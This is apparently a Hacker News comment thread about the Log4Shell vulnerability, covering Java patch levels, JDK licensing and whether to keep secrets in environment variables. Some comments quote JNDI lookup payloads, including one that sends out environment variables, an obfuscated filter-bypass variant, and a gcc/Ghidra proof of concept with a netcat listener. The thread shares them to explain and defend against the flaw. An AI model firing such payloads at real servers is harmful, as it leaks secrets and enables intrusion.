They could, sure, but that would again be a breaking change for the sake of being a breaking change. Also, maybe since those "nonportable" things are so widely used, Oracle should just add them to the API officially.


Java's backward compatibility applies only to the spec, i.e. the API. If any change to any method in the ~6 MLOC standard library is a "breaking change," then all changes are "breaking changes," and it doesn't matter whether there's good reason for them or not; we want things not to break, so internal code needs to be encapsulated. As for the last remaining popular "non-API APIs," which is mostly just Unsafe, it is, indeed, not encapsulated, and over time it will be shrunk as replacement APIs become available.


I would go the other way around - it's entirely Oracle's fault for trying to be too compatible with unfortunate mistakes made in the past. Java Serialization is the root of all these things, and should have been deprecated and more safeguards should have been added. Perhaps even an equivalent of --add-opens for which classes are safe to serialize!

This would certainly have broken a large number of software, but it's the right way to go. Whichever way you define the "compatibility promise", I think security overrides that.

At least it looks like Oracle is going this way[1], I just wish that it would have been sooner.

[1] https://inside.java/2019/11/07/whywehateserialization/


The log4j exploit was based on remote class loading, not serialization... though if your JVM protected you against remote class loading, it's indeed correct that one way to bypass that protection was by using a serialization attack.


It has been proven that if platforms don't ram changes through, their users will keep using the old ways as long as they can.


Where has this been proven? And what's wrong with using the old ways?


Windows XP, Java 8, Python 2, C++98, pre-1980s-style CLI apps... plenty of examples.


I think the most recent Minecraft release (1.18) actually requires Java 17?


They've only recently been bumping Java versions.

For the longest time, it was 6, then 8, and it stayed on 8 for years. IIRC 1.17 was a jump to Java 16 after a lot of internal reworking, and I guess with Java 17 being LTS, that's why they've moved to that.


So the parent poster was in fact wrong about Minecraft using Java 8.


Not really. Only the two most recent major versions of Minecraft use Java 16/17. A lot, possibly most, of the online community still plays on old versions 1.8.9 and 1.12.2 which use Java 8.


> 1.8.9 and 1.12.2

Correct me if I'm wrong, but isn't the first favored by pay-to-win servers and pvp specializing servers, while 1.12.2 is favored for modding? Both seem pretty niche to me, albeit noisy niches. There have been several substantial updates to the game since 1.12 and I'm quite sure most players are presently on 1.18 or at least 1.17. And I don't have much sympathy for the plight of those P2W servers.


1.14.4 works just fine on jdk 1.8, modded or otherwise. I know this, because I helped get it running properly with Forge integration on Raspberry Pi, and am working on building out an Aarch64 base Linux image for more recent versions to leverage the 8GB version of the Pi for maybe supporting a mod or two. Someone else may have done it already, but it's more an exercise in cross-compiling for me.

The lack of a 64 bit JDK build was the big blocker a couple years ago. Haven't checked back to see if Raspbian or anyone else got around to it.

I can second that modules were a way bigger deal than people here seem willing to admit. I avoided 9+ like the plague: redefining one of your base visibility modifiers, the inevitable charlie-foxtrot that would entail, plus Oracle's license shenanigans, was just not something I was willing to wade through.


At one point Oracle changed the licensing, which caused enterprises to stop upgrading.


So, the root of all problems is that companies don’t want to pay, not even when professional, paid support is available. Why complain, then?


With OpenJDK, do companies still license Java?


OpenJDK is GPL-2 + linking exception; Similar to LGPL. Dunno what that other guy is talking about.


Maybe there were some, mainly because people don't read and rather rely on Twitter feeds full of urban myths.


Minecraft ships with the latest 17.0.1 now (I run Java at MSFT; we supply their bits).


>It's a big deal because most large users of Java aren't actually using the newer versions. It's very hard to source that claim, and I apologize for the lack of hard data, but in my experience with "enterprise Java", it's almost all still Java 11, or even Java 8.

It should still not be a big deal, because there are mitigations in place for Java 11 and Java 8 - just upgrade to the latest patch revision: 11.0.2 and 1.8.0_192 or later exactly like an operating system security patch. Right now, it just feels like a big deal because everyone likes to pile on Java.


Regrettably I have multiple products, such as POS software from Oracle, that break on minor point-release Java updates.


According to the original RCE post:

> JDK versions greater than 6u211, 7u201, 8u191, and 11.0.1 are not affected by the LDAP attack vector.

So people just need to stay up to date on the latest patch version. Latest 8x is 8u312 and 11x is 11.0.13.

So Java 11 and 8 have some mitigation already in place, but people need to be applying patches like they should for all other critical system software.
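
If you want to sanity-check this at runtime, here's a rough sketch (the class name and the startup-check idea are mine; `com.sun.jndi.ldap.object.trustURLCodebase` is the real system property that patched JREs default to false, which is what blocks the LDAP codebase trick):

    import java.util.Locale;

    public class JreVersionCheck {
        public static void main(String[] args) {
            String version = System.getProperty("java.version");
            // Unset on most JREs; the default of "false" on patched
            // releases is the mitigation being discussed above.
            String trust = System.getProperty(
                    "com.sun.jndi.ldap.object.trustURLCodebase", "false");
            System.out.println("java.version=" + version
                    + " trustURLCodebase=" + trust);
            if ("true".equals(trust.toLowerCase(Locale.ROOT))) {
                System.out.println("WARNING: remote LDAP codebases are trusted");
            }
        }
    }

This only covers the LDAP vector, of course; as noted elsewhere in the thread, upgrading log4j itself is still necessary.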


But then whose fault is it? Software will always be compromised sooner or later by hackers looking for exploits.

I know Microsoft just threw the keyboard at the wall and said "fuck it everyone gets forced to update".


> But one thing that I haven't seen mentioned enough is that this only affects pretty old versions of java.

Recent versions were still susceptible to e.g. exfiltration of env vars, which may often contain secrets.

${jndi:ldap://127.0.0.1:1389/o=${env:PATH}}
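
To see why the nested form works, here's a toy model of recursive `${...}` expansion - not log4j's actual code, just a sketch of the mechanism - where the inner `${env:...}` resolves first and its value ends up embedded in the string the outer `${jndi:...}` lookup would send over the wire:

    import java.util.function.Function;

    public class ToyLookup {
        // Expand ${...} tokens; the resolver maps e.g. "env:PATH" to a
        // value, or returns null for prefixes it doesn't know.
        static String expand(String s, Function<String, String> resolver) {
            StringBuilder out = new StringBuilder();
            for (int i = 0; i < s.length(); i++) {
                if (s.charAt(i) == '$' && i + 1 < s.length() && s.charAt(i + 1) == '{') {
                    int depth = 1, j = i + 2;
                    while (j < s.length() && depth > 0) {
                        if (s.charAt(j) == '{') depth++;
                        if (s.charAt(j) == '}') depth--;
                        j++;
                    }
                    // recurse so inner lookups are expanded first
                    String inner = expand(s.substring(i + 2, j - 1), resolver);
                    String resolved = resolver.apply(inner);
                    out.append(resolved != null ? resolved : "${" + inner + "}");
                    i = j - 1;
                } else {
                    out.append(s.charAt(i));
                }
            }
            return out.toString();
        }

        public static void main(String[] args) {
            Function<String, String> r = key ->
                    key.startsWith("env:") ? System.getenv(key.substring(4)) : null;
            // the env lookup resolves even though jndi: is left alone,
            // so the secret is now embedded in the outgoing URL
            System.out.println(expand("${jndi:ldap://127.0.0.1:1389/o=${env:PATH}}", r));
        }
    }
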


This here is the reason why the current obsession with storing everything configuration related, including secrets, in environment variables is a bad idea. This is without even touching on the fact that the environment is propagated to every child process every time.


> including secrets, in environment variables is a bad idea.

I don't think this is the lesson to take away here. Arbitrary remote read of environment variables is not a common issue.

Also, you can easily not propagate secrets to a child process. But there isn't a ton of point to that on most systems, since if you can't trust your child process, just not passing in the secret is not gonna cut it.
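
For reference, scrubbing a secret from a child's environment is basically a one-liner with ProcessBuilder; a sketch (the DB_PASSWORD name is just an example):

    import java.util.Map;

    public class ScrubbedChild {
        static ProcessBuilder withoutSecret(String... cmd) {
            ProcessBuilder pb = new ProcessBuilder(cmd);
            Map<String, String> env = pb.environment(); // starts as a copy of ours
            env.remove("DB_PASSWORD");                  // child never sees it
            return pb;
        }

        public static void main(String[] args) {
            ProcessBuilder pb = withoutSecret("env");
            System.out.println("child env has secret: "
                    + pb.environment().containsKey("DB_PASSWORD"));
        }
    }
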


What other place do you suggest for secrets? File access is an even more common security bug, and files may also be accessed by subprocesses and even other processes. Command-line arguments don't propagate to children, but are accessible. I don't know of any other options that would be reasonably easy to use.


Files have all sorts of protection mechanisms available, both built into the file system and on top of it, are traditionally used to store secrets, and don't generally leak. So that should be the starting point.

A command line argument would be visible in the process table; hopefully no one would suggest that. It also is not persistent, so it generally needs to be fed from someplace anyway, generally a file. This is something it shares with environment variables.
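
For what it's worth, creating the file with owner-only permissions atomically avoids the chmod-after-write race where the secret is briefly world-readable; a Java sketch (POSIX-only; path and contents invented):

    import java.io.IOException;
    import java.nio.file.Files;
    import java.nio.file.Path;
    import java.nio.file.attribute.PosixFilePermission;
    import java.nio.file.attribute.PosixFilePermissions;
    import java.util.Set;

    public class SecretFile {
        // Create the file 0600 from the start, then write the secret.
        static Path writeSecret(Path path, String secret) throws IOException {
            Set<PosixFilePermission> rw = PosixFilePermissions.fromString("rw-------");
            Files.createFile(path, PosixFilePermissions.asFileAttribute(rw));
            Files.writeString(path, secret);
            return path;
        }

        public static void main(String[] args) throws IOException {
            Path dir = Files.createTempDirectory("demo");
            Path p = writeSecret(dir.resolve("db-password"), "hunter2");
            System.out.println(Files.getPosixFilePermissions(p));
        }
    }
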


Stdin and keep in variables only. I know it’s a lot less convenient but if you are looking for security this is one level up.

Files in /tmp that your application deletes immediately after read is another.
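
A sketch of the stdin approach in Java (method names are mine): read the secret into a char[] so it can be zeroed afterwards, unlike an interned String, and never put it in the environment or argv:

    import java.io.ByteArrayInputStream;
    import java.io.IOException;
    import java.io.InputStream;
    import java.util.Arrays;

    public class StdinSecret {
        // Read one line from the stream into a wipeable char[].
        static char[] readSecret(InputStream in) throws IOException {
            StringBuilder sb = new StringBuilder();
            int c;
            while ((c = in.read()) != -1 && c != '\n') sb.append((char) c);
            char[] secret = new char[sb.length()];
            sb.getChars(0, sb.length(), secret, 0);
            sb.setLength(0); // best-effort cleanup of the builder
            return secret;
        }

        public static void main(String[] args) throws IOException {
            char[] secret = readSecret(new ByteArrayInputStream("s3cret\n".getBytes()));
            try {
                System.out.println("got " + secret.length + " chars");
            } finally {
                Arrays.fill(secret, '\0'); // wipe when done
            }
        }
    }

(For interactive use, Console.readPassword() does the char[] part for you.)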


In git, as encrypted files. It couldn’t be easier: https://neosmart.net/blog/2020/securestore-open-secrets-form...


TBF, files should be fine if we use something like the OpenBSD unveil mechanism.


Okay, yes, but to date, to a first approximation, nobody does that. And yes, that's unfortunate, but in the world we live in, and the world we will live in for the near future, environment variables seem no worse than any other option, regardless of ways that other options could be made better.


Env vars are strictly worse than files because of how easy they are to access. You need shell code of some sort to read a file assuming you don’t privilege drop whereas env vars are persistently available to everything everywhere.


Huh? Environmental variables are only available to a process, any children the process has, any other process running as the same user ID, and the root user on a given POSIX compliant system.

E.g. if I do this:

  export FOO=bar

processes running as other user IDs (unless root) will not know FOO is “bar”. Actually, even other processes running as me/root won’t know FOO’s value until I spawn a child process after that “export” command; the environment only becomes visible outside a process when it runs execve() and passes its environment on.

An environmental variable is about as safe as a file with 600 or 700 perms (i.e. make a file be set up with POSIX ACLs to be read only by the owner of the file): If user separation is done so insecure processes run with a different user/group ID (and modern *NIX system gives each user its own default group), the cracker still has work to do before getting important secrets in our environment.

Also, FOO being bar in the environment (i.e. we can see it with getenv()) will only be visible to the current process and any child process spawned after “export FOO=bar”.

If you’re able to run getenv() to get at the environment, or able to read (in Linux) /proc/$PID/environ to see the environment of other processes running as you, you will generally also be able to run open() to get at files.

Environment leaking is a serious bug in a *NIX/POSIX system; If I can, as “Alice”, view anything in the environment belonging to “Bob”, that’s a serious security bug which needs to have a CVE number.



Thank you for the link and information.

To be fair, while a concern, that’s not “everything everywhere”. That’s the current process, child processes (even if setuid), root, other processes running as the same user, and maybe processes with different user IDs sharing the same d-bus (D-bus is not used on servers, only desktop systems). I consider that slightly but not much more leaky than an unencrypted chmod 600 or chmod 700 permission file.

It’s more secure than, say, command line arguments (which can be seen by any process on the same system).


> dbus is not used on servers?

In my experience dbus has shown up on embedded devices, routers, servers, desktops, etc. Maybe it’s not being used and I don’t know it… Avahi (the mDNS daemon & tool), for example, uses dbus.

I would say containers are more to blame for making env var secrets pretty okay. But people should be aware of what the systemd man page says about env vars because there are scenarios where persisting secrets in a spot easily queryable via procfs and/or dbus is not okay.

And systemd provides a way to correctly pass secrets by allowing you to specify a credential blob that is accessible via the filesystem and properly restricted to the target service. So there’s an easy way to securely pass secrets, people should use that before reaching for env vars.

https://www.freedesktop.org/software/systemd/man/systemd.exe...
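
For the record, a minimal unit-file sketch (paths and names invented); the app then reads the secret from $CREDENTIALS_DIRECTORY instead of the environment:

    # systemd's LoadCredential= exposes the secret as a root-owned file
    # under $CREDENTIALS_DIRECTORY, readable only by this service --
    # no environment variable involved.
    [Service]
    ExecStart=/usr/local/bin/myapp
    LoadCredential=db-password:/etc/myapp/db-password
    # the app reads ${CREDENTIALS_DIRECTORY}/db-password at startup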


Thank you again for the informative reply. I saw two dbus-daemons running on my Ubuntu server; I killed the user d-bus daemon process running as me and nothing seems to break, so while it’s there, it doesn’t seem to be used by anything on my server.

While I do note that systemd man page, it goes into no detail about how dbus leaks the environment.

Looking at the D-Bus specification [1], org.freedesktop.DBus.UpdateActivationEnvironment is the only thing which concerns itself about the environment. It says that the “session bus activated services inherit the environment of the bus daemon”, so it looks like the D-Bus leakage is any system-level environmental variables set when the D-Bus daemons are started, or any variables set using UpdateActivationEnvironment.

The concern here appears to be that system-level environmental variables aren’t safe. I don’t see anything about a user process setting something like export FOO="top secret password" being more unsafe than a chmod 700 or chmod 600 file.

I have already noted the various ways environmental variables can leak on this page:

https://github.com/samboy/rg32hash/blob/master/C/microrg32.m...

I will update the D-Bus information there based on what I read in the D-Bus spec.

[1] https://dbus.freedesktop.org/doc/dbus-specification.html


> I saw two dbus-daemons running on my Ubuntu server; I killed the user d-bus daemon process running as me and nothing seems to break, so while it’s there, it doesn’t seem to be used by anything on my server.

Every systemd service is exposed on a dbus path in systemd. You can query a service's environment like so:

    $ systemctl status foo
    ● foo.service - Can we read this service's environment over dbus?
         Loaded: loaded (/etc/systemd/system/foo.service; static)
         Active: active (running) since Tue 2021-12-14 23:00:10 PST; 6min ago
       Main PID: 104167 (sleep)
          Tasks: 1 (limit: 9366)
            CPU: 1ms
         CGroup: /system.slice/foo.service
                 └─104167 sleep 3600
    $ qdbus --system org.freedesktop.systemd1 /org/freedesktop/systemd1/unit/foo_2eservice org.freedesktop.systemd1.Service.Environment
    Error: org.freedesktop.DBus.Error.AccessDenied
    Rejected send message, 2 matched rules; type="method_call", sender=":1.761" (uid=1000 pid=104282 comm="/usr/lib/qt5/bin/qdbus --system org.freedesktop.sy") interface="org.freedesktop.systemd1.Service" member="Environment" error name="(unset)" requested_reply="0" destination="org.freedesktop.systemd1" (uid=0 pid=1 comm="/sbin/init splash ")
    $ sudo qdbus --system org.freedesktop.systemd1 /org/freedesktop/systemd1/unit/foo_2eservice org.freedesktop.systemd1.Service.Environment
    FOO=secret-secret
So you can read it, but it seems systemd does enforce some sane default permissions on who can read the environment.


Where else do we put them? Cloud secret stores? Where do we store the credentials for that?


8 and 11 are LTS releases, and are still supported. 17 is the new LTS, but it's only been out for two months. See https://endoflife.date/java


Yeah, a couple years ago I had to decide what version of Java to use in an environment where it needed to run for as long as possible with minimal maintenance, and I found myself in the weird position of intentionally shipping 8 because it had longer support than the newer versions we could have used. It's a weird position, but rational.


If this survey is to be believed, as of last year, nearly everyone is using either Java 8 or Java 11, with Java 8 being the overwhelming favorite with almost 60% of respondents reporting using it.

https://www.jrebel.com/blog/2020-java-technology-report


Fair. There's been some licensing ... well shall we call them mishaps ... in the last couple of years. That I think has kept a lot of folks on older versions of Java.

But even if folks are okay on java8 (first released in 2014!) there is a version of java8 that is not vulnerable and it has been around for 3 years.


It’s not the licensing, it’s the amount of incompatibilities JDK 9 introduced.

Also, current JDK versions are still vulnerable: https://mbechler.github.io/2021/12/10/PSA_Log4Shell_JNDI_Inj...


Precisely. JDK 8 -> 11 is not "drag and drop". While that was mostly the case up through JDK 8, the JDK 9 changes are a large hurdle, and clearing it is easier said than done.

Plus, if you're working on legacy app servers, you're bound to whatever they are running, regardless of what your actual application supports. Then add the whole Java EE -> Jakarta EE transition that was ladled on top of the JDK 8 -> 11 transition, and it wasn't just a can of worms, but a kettle of fish and a barrel of monkeys all at once.


Both the licensing issues and the upgrade cost are largely myths.

Licensing is only an issue if you want to keep using the free Oracle JDK, but there is seriously no need to.

JDK upgrades were never drag and drop. When we upgraded Java 6 to Java 8 we had just about the same amount of issues we had when upgrading Java 8 to 11. Some libraries had to be updated. Bloated application servers like Tomcat and Glassfish (let alone beasts of legend like WebLogic) needed an entirely new major version to cope with that.

The misconception that Java 11 is an especially rough upgrade comes from exaggerated worries about modules, and perhaps from the faster rate of change: eight years passed between Java 6 and Java 8, but only four between Java 8 and Java 11.


Using Java 8 doesn’t mean you have to use 8u51 or whatever - you can use 8u300+ or whatever the current release is.


Simply using a modern JDK does not fully resolve the issue. See here: https://mbechler.github.io/2021/12/10/PSA_Log4Shell_JNDI_Inj...


It would probably be a shocker to you, but there are still companies operating on COBOL, because the software does what it was supposed to do and does it well.

If no functional changes are required, software should be just fine running for decades.

Not every company is able to spend on continuous development. Oftentimes rewriting something ends up being a big cost that never pays for itself.


openjdk version "11.0.11" 2021-04-20 (latest in Ubuntu?)

    __attribute__((__section__(".note.${jndi:ldap://127.0.0.1:1234/abc}")))
    int a = 1;
    int main(){}
Compile this with gcc and listen on port 1234 with netcat:

    gcc main.c -o main
    nc -lp 1234

Launch Ghidra, confirm that it is using OpenJDK 11.0.11, and then open the built binary. It absolutely connects to localhost port 1234 and spits out some garbage there. Perhaps it does not have RCE impacts but it does cause the system to do something unintended and could expose IP addresses or other aspects of the running environment.


It does have the RCE impact. You can still use gadget chains.


Good to know. My point was mostly that it still seems to happen on "new" JVMs and I'm not sure if I'm doing something wrong or if openjdk is different than Oracle JDK.


Although the Java ecosystem generally moves glacially slowly, Java 11 is still supported and has LTS status. Unless you're willing to risk your livelihood on briefly-supported versions, you'll probably want to stick to an LTS release.

Java received a new LTS release this year. In the three years between Java 11 and the latest LTS there were six new releases. That's a lot of releases, and you can easily end up with a dependency that doesn't work with a new version of Java yet before the working version goes out of support.

Also, the update advice only works for the very specific demo exploit. Other exploits still work, so you'll need to update the library itself.


I wouldn't agree that these are "pretty old." Maybe in frontend terms of software, but not backend.


2-3 years is pretty old.

Java backward compatibility is really good, even better within the same major version, so I don't see why you shouldn't update. If you have a Docker image with Java, just pull the base image before you build; if you run it bare, you need to update the server packages periodically, better yet with unattended upgrades set up (the default in recent Ubuntu versions, though some updates need a server restart to apply). It's not like there are no security fixes between Java updates; there are, so you should update.

Nevertheless other mitigations like not exposing internal services to the internet would have blocked these attempts.


> 2-3 years is pretty old.

In the JS or NodeJS world, sure. For pretty much everyone else, not so much.


I wasn't talking about a third-party library. Java is your runtime platform; it has security fixes rolled out regularly.

If you are an enterprise company running a 3-year-old Java version, then

1) Your CSO and CIO should all be fired

2) Your security team should be replaced

3) Your ISO 27001 and SOC2 certification among others should be revoked


Until two months ago the LTS release of Java - Java 11 - was 2 years old.


Not sure what you are talking about.

Java 11 was released on 2018-09-25

Java 11.0.2 that contained the "fix" was released on 2019-01-15

Java 11.0.13 (latest) was released on 2021-10-19

Also Java 8u192 was released on 2018-10-16


I think you and parent(s) kept exchanging messages which conflated major and minor Java versions.

Java 11 as a major is not old, it’s probably the best GA version right now, 17 is at a very early adoption stage.

Openjdk 11.0.0 would be too old, though.



If it's an enterprise running a 3y old JVM, what makes you think they have a CSO, CIO, or security team?


For internet connected software, it's pretty old. If you don't update for 3 years and expect to still be secure, you are in for a shock.


Obviously you shouldn't go three years without security patches. But it's perfectly reasonable to not update to a new major version for three years.


Not keeping up with patch versions of your runtime.

As other comments mentioned even with a patched JDK you are still vulnerable in other ways, but the specific method this whole thread is about seems to have patches in Java 8 and 11 releases.

I understand that lagging new major releases by years can be prudent for different apps, but there is no excuse for not updating your patch versions.


Something that's 2-3 years old maybe has enough bugs worn off it by the early adopters that enterprise users might start thinking about maybe using it in Q4 of next year. After a massive pilot program to do a test rollout and lab deployment.


They are. You should have an up-to-date runtime to prevent vulnerabilities, or just to have more-or-less accurate TZ databases if nothing else.

It can be Java 8, but please use one with actively developed security patches.


If you had the extended support contract, you could get that version of Java 6. I could have sworn 6u212 was the last release before it hit EOL (it's been a while). Java 7u321, 8u311, and 11.0.13 are current. 7, 8, 11, and 17 are all LTS releases that get quarterly patches, so the minor upgrades are pretty painless if you happen to be stuck on something older.


I have tons of stuff running on Java 8. It's LTS version and no reason to change working builds, adding more unknowns into the system.


The log4j patch to fix this vuln is available since March 2021. 9 months later... time to panic.


Java 11 is not deprecated. It is fairly absurd to frame it as old.


Can't edit this, but apparently there are multiple attack vectors and only a few are mitigated by a recent version of java. More here from brabel: https://news.ycombinator.com/item?id=29524578

tl;dr: upgrade your version of log4j.


My team still uses .NET Framework 4.6. That's from like 2015. While not "ancient," it's still pretty old. But for instance, when the SolarWinds hack occurred, we actually lucked out because we were using a version from before the intrusion.


My org at AWS just upgraded from Java 8 to Java 11 last year. I doubt anyone is on 17.


The thing is it’s not about Java 11, 14, or 17. If you must be on 8 at least use the latest patch versions.


Oh I didn't realize that.

That makes patching the issue pretty trivial then, right? Anyone deploying production software should be updating their minor versions anyway.


The latest LTS version of OpenJDK is 11 (https://adoptopenjdk.net). I certainly don't touch the Oracle version with a barge pole and I assume that a large proportion of the industry also avoid it.


FYI: AdoptOpenJDK is now https://adoptium.net/ and the latest LTS version is 17.


There's something funny about an OpenJDK release being hosted on a .net domain. dotnet really is a terrible name for a programming language and framework.


The .net domain is for network operators and that sort of thing. It predates, and has nothing to do with, Microsoft's .NET.


Of course, that's where Microsoft's dumb name probably came from. They already had COM and needed a new name (COM+ sucked), so they went with .NET.


They went with .NET because it was supposed to bring DCOM into the Cloud via SOAP.

Except Cloud still wasn't a thing back then, and we had to go through the whole SOAP, XML-RPC, REST but not really, GraphQL, gRPC fashion cycle to come back to Microsoft's vision of Web APIs.


Ugh. That seems like a really, really silly name change.

Going from something obvious, to something that has no immediate relationship to java, jdk, or anything related. :/

I guess people will have to learn to remember it over time.


Some time ago I read a pertinent comment from someone working on JDK here on HN. Unfortunately I can't find it, so I'll have to paraphrase:

Even though Adoptium has some big names backing it, they aren't big contributors to Java. This is relevant because it implies they get access to not-yet-publicly-disclosed vulnerabilities and the corresponding patches later than other projects. Rather, one should try to use a distribution by one of the major contributors, for example Red Hat or SAP.

Since I cannot currently provide the source and I cannot personally verify this either, take this with a grain of salt.


You are undoubtedly referring to pron's comment here:

https://news.ycombinator.com/item?id=28821316


The folks who work at Adoptium include many OpenJDK committers (especially from Red Hat and Microsoft), so it does contribute back (but you'll see those folks using their company addresses). I agree that can confuse people.


> Ugh. That seems like a really, really silly name change.

When they became an Eclipse project, the Eclipse Foundation was concerned that "AdoptOpenJDK" might lead to trademark problems with Oracle, given that "OpenJDK" is an Oracle trademark. Absent explicit permission from Oracle to use a name incorporating "OpenJDK" (which has not been received), Eclipse said the name had to change.


Actually, the full name is Eclipse Adoptium Temurin now. O_o


Same with Azul Zulu. 17 is LTS.


Maybe this will hasten the demise of Java


Why does Java the language have to be a target of demise because of an exploit in a library written in it? This kind of exploit would be possible in other languages.


Java has remote code execution as a feature built in, which is possible in other languages but not widely used.


Now I could consider Java the Flash of the server side; will it eventually be killed by JavaScript?


Backwards compatibility over quality is possibly the dumbest fucking idea our field has punished itself with. When we fail to combat it, we deserve the pain we get.

That said, unpaid developers deserve shit only to the extent that they are receiving compensation. Although fame can be some sort of compensation, you shouldn't lose more of it than you've gained by doing the project.


For exposure


It'd be interesting to see a library versioning model where every release is a breaking release, where we accept that Hyrum's law is a fact of reality (like Nix I guess?).

Then, the release process of a new version is additionally required to provide some migration path from previous releases. For example, if the language-level API is the same, but the behavior is slightly different, provide a diagnostic message that shows up in the editor when the library's updated.

On the other hand, if the language-level API has changed, additionally provide a "go fix"-like program that can migrate the user's code to use the updated library. As long as a migration path is provided/automated, updating libraries would be as easy updating to use an API-compatible release.


Much like the truism I heard over the last week “friends don’t let friends use us-east-1”, this is one I heard a few years ago “Everything under the Apache umbrella is shit or will turn to shit.”


> Log4j maintainers have been working sleeplessly on mitigation measures; fixes, docs, CVE, replies to inquiries, etc.

They've been doing a poor job of communicating. Considering the attention this issue is getting, they should have a prominent notice on their project page[0] about it like the one Logback[1] has telling people that they are not affected.

Furthermore, even their post about the issue[2] still fails to clarify many details like

* are people using newer JDK versions safe, like one commenter in this very thread assumed[3] ?

* does it only affect the format string and not parameters as many [falsely] claimed when the news started making the rounds ?

* what should people trying to block exploitation on a firewall level look for ?

> for a feature we all dislike yet needed to keep due to backward compatibility concerns.

They have not recognized the security risk posed by what is effectively an expression language interacting with user-submitted data. Java projects used in server-side templating like OGNL, JSP and JSF implementations, Spring keep having security vulnerabilities with this even after 20+ years. It is an effectively impossible task to get this 100% secure.

The ridicule Log4j is getting serves a purpose beyond fun: it lets people know that the project's maintainers are not up to the task and another logging library should be used instead, as there might be more issue still undiscovered or added in the future.

[0] https://archive.ph/ZhjWO

[1] https://archive.fo/QkzIy

[2] https://archive.fo/NvjKP

[3] https://archive.fo/5cNtw


- Newer versions of the JDK partly mitigate the issue by disallowing, by default, the vector used to fetch the untrusted code.

- Parameters are affected as well, as there seems to be some form of recursive string interpolation going on.

- Packet inspection would look for the jndi-lookup interpolation in the client message, "${jndi:", which in most cases should have no reason to be in client traffic (unless compressed).

Again, the risk is real when the server uses un-sanitized client data.
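
As a caveat on the packet-inspection point: a literal substring match is trivially bypassed by nesting other lookups, which is why filtering is at best a stopgap and patching is the real fix. A toy illustration (not a real WAF rule):

    import java.util.Locale;

    public class NaiveJndiFilter {
        // Flag payloads containing the literal "${jndi:" marker.
        static boolean looksSuspicious(String payload) {
            return payload.toLowerCase(Locale.ROOT).contains("${jndi:");
        }

        public static void main(String[] args) {
            System.out.println(looksSuspicious("${jndi:ldap://evil/a}"));     // true
            // Obfuscation like ${${lower:j}ndi:...} defeats the literal match:
            System.out.println(looksSuspicious("${${lower:j}ndi:ldap://e}")); // false
        }
    }
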



